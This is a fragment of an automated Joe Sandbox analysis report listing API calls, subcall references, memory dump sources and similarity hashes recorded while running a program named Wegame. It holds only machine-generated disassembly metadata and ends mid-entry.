                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • _Open_dir.MSVCP140(?,?,?,?,?,?,?,00000000,Function_00066916,00000218), ref: 00458A16
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_Open_dirmalloc
                                                                • String ID:
                                                                • API String ID: 1858716368-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 2349883465-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _Read_dir.MSVCP140(?,85A35C35,?), ref: 0046742E
                                                                • _Close_dir.MSVCP140(00000000), ref: 00467441
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Close_dirRead_dir
                                                                • String ID:
                                                                • API String ID: 543304316-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _Read_dir.MSVCP140(?,1F5A0D44,?,?,6C09A4EC), ref: 6BDD438D
                                                                • _Close_dir.MSVCP140(00000000,?,?,6C09A4EC), ref: 6BDD43A0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Close_dirRead_dir
                                                                • String ID:
                                                                • API String ID: 543304316-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83D63
                                                                  • Part of subcall function 6BD85ECA: InterlockedCompareExchange.KERNEL32(6C09F010,000000FF,00000000), ref: 6BD85EE0
                                                                  • Part of subcall function 6BD85ECA: memmove.VCRUNTIME140(?,6C09F000,00000010,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85EFD
                                                                  • Part of subcall function 6BD85ECA: InterlockedExchange.KERNEL32(6C09F010,00000001), ref: 6BD85F08
                                                                • memmove.VCRUNTIME140(?,?,00000010,?,00000018,6BD83E28,?,00000010), ref: 6BD83D9E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExchangeInterlockedmemmove$CompareH_prolog3_
                                                                • String ID:
                                                                • API String ID: 1558543935-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?,?,?,?,6BDA8BC5), ref: 6BDA8C26
                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,6BDA8BC5), ref: 6BDA8C3B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CreateMappingView
                                                                • String ID:
                                                                • API String ID: 3452162329-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BD3A5BC: __EH_prolog3.LIBCMT ref: 6BD3A5C3
                                                                  • Part of subcall function 6BD3A5BC: ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(00000008,?,?,00000008,6BD44945,00000008,?,?,00000000), ref: 6BD3A5D9
                                                                  • Part of subcall function 6BD3A5BC: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(0000000F,00000000,00000001,?,?,?), ref: 6BD3A5F5
                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000000,6BD36B89,?,?,6BD3A68F,?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004), ref: 6BD3A653
                                                                • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,00000000,6BD36B89,?,?,6BD3A68F,?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004), ref: 6BD3A65D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Fiopen@std@@H_prolog3U_iobuf@@Vlocale@2@
                                                                • String ID:
                                                                • API String ID: 736196837-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • OpenFileMappingW.KERNEL32(00000006,00000000,?,?,6BDA8C01,?,6BDA8BAC), ref: 6BDA8C59
                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,6BDA8C01,?,6BDA8BAC), ref: 6BDA8C72
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$MappingOpenView
                                                                • String ID:
                                                                • API String ID: 3439327939-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,1001B830,00000001), ref: 1001CFA4
                                                                  • Part of subcall function 1001D044: HeapAlloc.KERNEL32(00000000,00000140,1001CFB8), ref: 1001D051
                                                                • HeapDestroy.KERNEL32 ref: 1001CFC2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocCreateDestroy
                                                                • String ID:
                                                                • API String ID: 2236781399-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00453262: __EH_prolog3.LIBCMT ref: 00453269
                                                                  • Part of subcall function 00453202: __EH_prolog3.LIBCMT ref: 00453209
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD4423A
                                                                  • Part of subcall function 6BD42B15: __EH_prolog3.LIBCMT ref: 6BD42B1C
                                                                  • Part of subcall function 6BD42AB5: __EH_prolog3.LIBCMT ref: 6BD42ABC
                                                                • _CxxThrowException.VCRUNTIME140(?,6C044AE4,?,00000054,?,6C044B6C,?,000000B4,6BD442D6,00000000), ref: 6BD44265
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,6BE380C4,00000D24,6BE34ED9,6BE380C4,?,00000000,6BE38044,6BE396E3,?,00000000,6BE385FF,00000000,00000000,00000000), ref: 6BE64AFA
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,6BE38044,6BE396E3,?,00000000,6BE385FF,00000000,00000000,00000000,00000000,00000001,00000000,Closing connection %ld), ref: 6BE64B06
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotificationObjectSingleWait
                                                                • String ID:
                                                                • API String ID: 92520688-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD27383
                                                                • ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,00000004), ref: 6BD2738F
                                                                  • Part of subcall function 6BD874A3: __EH_prolog3_catch_GS.LIBCMT ref: 6BD874AD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_first_mac@common@ierd_tgp@@D@2@@std@@D@std@@H_prolog3H_prolog3_catch_U?$char_traits@V?$allocator@V?$basic_string@
                                                                • String ID:
                                                                • API String ID: 3954339525-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2427045233-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A3ED
                                                                  • Part of subcall function 6BD1CEF4: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6BD1A734,?,00000004,6BD1A09E,?,1F5A0D44), ref: 6BD1CF53
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD4A5B5: __EH_prolog3_GS.LIBCMT ref: 6BD4A5BF
                                                                  • Part of subcall function 6BD4A5B5: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A65F
                                                                  • Part of subcall function 6BD4A5B5: ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA), ref: 6BD4A6D3
                                                                  • Part of subcall function 6BD4A5B5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6BD4A6E2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@4@@V?$basic_istringstream@$?decode_stream@common@ierd_tgp@@?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@std@@@std@@@std@@D@std@@@4@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_istream@V?$basic_string@V?$basic_string@_V?$optional@V?$reference_wrapper@W@2@@std@@W@std@@memmove
                                                                • String ID:
                                                                • API String ID: 3116802981-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,6BE1592B,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00000000,?), ref: 6BE14EE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2A733: __EH_prolog3.LIBCMT ref: 6BD2A73A
                                                                  • Part of subcall function 6BD2A733: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000004,6BD2A7D7,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD2A744
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ??0?$basic_streambuf@D@std@@@std@@H_prolog3H_prolog3_U?$char_traits@
                                                                • String ID:
                                                                • API String ID: 4027586451-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                  • Part of subcall function 0043F72C: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?), ref: 0043F74B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch___stdio_common_vsprintf
                                                                • String ID:
                                                                • API String ID: 2700776485-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD1FB37: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,?,?,6BD1E9A3,?,?,?,00000010,?,00000000,00000020), ref: 6BD1FB56
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch___stdio_common_vsprintf
                                                                • String ID:
                                                                • API String ID: 2700776485-0
                                                                • Opcode ID: df518d40707a6a24ffb742b056684b84295f2e1f269560ec311697a9515819a6
                                                                • Instruction ID: e118a3d19f8e7d91c7595aff78d5db6ed5b217be1c7bb8ae6b34bc3c1ff5dd23
                                                                • Opcode Fuzzy Hash: df518d40707a6a24ffb742b056684b84295f2e1f269560ec311697a9515819a6
                                                                • Instruction Fuzzy Hash: 17113772C04249DBDF01DFB8D8919DEBBB4BF18224FA08069D121AB151DB389B08DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: a447a25ba20c81eb41917cc1bc966eaacec2a391da9913e400c94c396145ce26
                                                                • Instruction ID: b2b122fbf4b6cb1f982d7523337411f2ebf28be255b16017bd23d31666cef4c6
                                                                • Opcode Fuzzy Hash: a447a25ba20c81eb41917cc1bc966eaacec2a391da9913e400c94c396145ce26
                                                                • Instruction Fuzzy Hash: 88F0F439B041217BDB116636EC01BEABB65BF82325F20405AFA2453300C339F471C3D1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD25014
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3malloc
                                                                • String ID:
                                                                • API String ID: 266865037-0
                                                                • Opcode ID: 2468a88919b391816652b6d86a687f68255564ddf6c7d001842c7eeabea034c2
                                                                • Instruction ID: 7ccce0480ed9531dbeab34474c8f359b2a7ae752c8f2dc2c8720deb0cd3b5495
                                                                • Opcode Fuzzy Hash: 2468a88919b391816652b6d86a687f68255564ddf6c7d001842c7eeabea034c2
                                                                • Instruction Fuzzy Hash: AC012C71901249EFCF01CFA4894089EBFB1BF08714B50846EEA09AB260C735CA11EB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6BD23AE5,?,?,?), ref: 6BD23A59
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _beginthreadex
                                                                • String ID:
                                                                • API String ID: 3014514943-0
                                                                • Opcode ID: fcb4b73a6b7571e57deac0eaab12d69269d757769499ed63efac52a59789198d
                                                                • Instruction ID: 3b53e8d59bdb2762dcf6e3651a938c4fab2f16dd0898e1e70ca7b2b137599e06
                                                                • Opcode Fuzzy Hash: fcb4b73a6b7571e57deac0eaab12d69269d757769499ed63efac52a59789198d
                                                                • Instruction Fuzzy Hash: EFF09676554505BF9714CF29CC41857F7E8FE85378310C73AA529C7650E730E05587E8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD367C9
                                                                  • Part of subcall function 6BD3684F: memset.VCRUNTIME140 ref: 6BD36880
                                                                  • Part of subcall function 6BD3A075: __EH_prolog3_GS.LIBCMT ref: 6BD3A07C
                                                                  • Part of subcall function 6BD3A075: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,0000001C,6BD36841), ref: 6BD3A097
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3__time64memset
                                                                • String ID:
                                                                • API String ID: 3469414599-0
                                                                • Opcode ID: 3f1d8fd3aabb1cffd49d1809b25d6ba0064378fe16c8755cd184b9279d5e6cd6
                                                                • Instruction ID: 2fdfb4397caea18b9f7322732d4092504142f682d90e89edaf4602e821e41748
                                                                • Opcode Fuzzy Hash: 3f1d8fd3aabb1cffd49d1809b25d6ba0064378fe16c8755cd184b9279d5e6cd6
                                                                • Instruction Fuzzy Hash: D9011771919B80CAC725DF7984916CAFFF1BF29310F54896FD1EA9B252C370A604CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2427045233-0
                                                                • Opcode ID: f8f4a6c97e3a911ae5c5912d56cb80c8408a99c9c5184409d6666c36d325e6ce
                                                                • Instruction ID: bf2f355dde223ee5365b2f3fd491116f0b6cc93ae7453497cf0d6312f712d7bd
                                                                • Opcode Fuzzy Hash: f8f4a6c97e3a911ae5c5912d56cb80c8408a99c9c5184409d6666c36d325e6ce
                                                                • Instruction Fuzzy Hash: 66010075901208EFCF04DFA4E8819DDBBB2FF49320F208059E925AB3A0C734AA11DF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD34456
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3malloc
                                                                • String ID:
                                                                • API String ID: 266865037-0
                                                                • Opcode ID: 33d7f6560ed9b567fcb6baa78f68b4d2aefe8860636929c4640156a7a3f57bc8
                                                                • Instruction ID: d68620e33f65fb6ca5d55a50194f59cfe51f90d0883a1277af043a3bc692b35d
